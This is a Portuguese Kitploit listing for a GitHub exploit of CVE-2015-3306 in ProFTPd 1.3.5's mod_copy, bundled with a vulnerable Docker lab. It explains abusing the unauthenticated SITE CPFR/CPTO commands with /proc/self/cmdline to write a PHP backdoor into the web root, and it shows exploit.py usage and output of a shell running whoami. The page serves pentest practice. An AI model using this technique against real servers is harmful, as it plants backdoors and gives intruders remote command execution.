Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
exploit-CVE-2015-3306 — ProFTPd 1.3.5 - (mod_copy) exploit de execução remota de comandos e contêiner vulnerável | Kitploit
Ferramentas/GitHubGitHub/t0kx/exploit-cve-2015-3306
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubt0kx/exploit-cve-2015-3306

exploit-CVE-2015-3306

ProFTPd 1.3.5 - (mod_copy) exploit de execução remota de comandos e contêiner vulnerável

Ver Repositório
15154há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ProFTPd 1.3.5 - (mod_copy) Execução Remota de Comandos

O ProFTPD é um daemon FTP altamente configurável para Unix e sistemas operacionais semelhantes ao Unix. O ProFTPD surgiu do desejo de ter um servidor FTP seguro e configurável. Foi inspirado por uma grande admiração pelo servidor web Apache. Ao contrário da maioria dos outros servidores FTP Unix, ele não foi derivado do código base do antigo BSD ftpd, mas é um design e implementação completamente novos.

Ambiente vulnerável

Para configurar um ambiente vulnerável para o seu teste, você precisará do Docker instalado e basta executar o seguinte comando:

root@kitploit:~
docker build -t vuln/cve-2015-3306 .
docker run --rm -it -p 21:21 -p 80:80 vuln/cve-2015-3306

E isso iniciará uma aplicação vulnerável no seu host nas portas 21 e 80

Código vulnerável

O módulo mod_copy no ProFTPD 1.3.5 permite que atacantes remotos leiam e gravem arquivos arbitrários por meio dos comandos site cpfr e site cpto. Qualquer cliente não autenticado pode aproveitar esses comandos para copiar arquivos de qualquer parte do sistema de arquivos para um destino escolhido. Os comandos de cópia são executados com os direitos do serviço ProFTPD, que por padrão roda com os privilégios do usuário 'nobody'. Ao usar /proc/self/cmdline para copiar um payload PHP para o diretório do site, a execução remota de código PHP se torna possível.

Exploit

Para explorar este alvo, basta executar:

root@kitploit:~
./exploit.py --host HOST --port PORT --path PATH

Se você estiver usando esta imagem vulnerável, basta executar:

root@kitploit:~
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"

Após a exploração, um arquivo chamado backdoor.php será armazenado na pasta raiz do diretório web. E o exploit abrirá um shell onde você pode enviar comandos para o backdoor:

root@kitploit:~
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 127.0.0.1:21
[+] Target exploited, acessing shell at http://127.0.0.1/backdoor.php
[+] Running whoami: www-data
[+] Done

Créditos

Esta vulnerabilidade foi encontrada por Vadim Melihow.

Aviso legal

Este programa ou os anteriores são apenas para fins EDUCACIONAIS. Não o use sem permissão. O aviso legal usual se aplica, especialmente o fato de que eu (t0kx) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de internet NÃO assume responsabilidade pelo conteúdo ou uso indevido destes programas ou de seus derivados. Ao usar estes programas, você aceita o fato de que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do t0kx.

Baixar ferramenta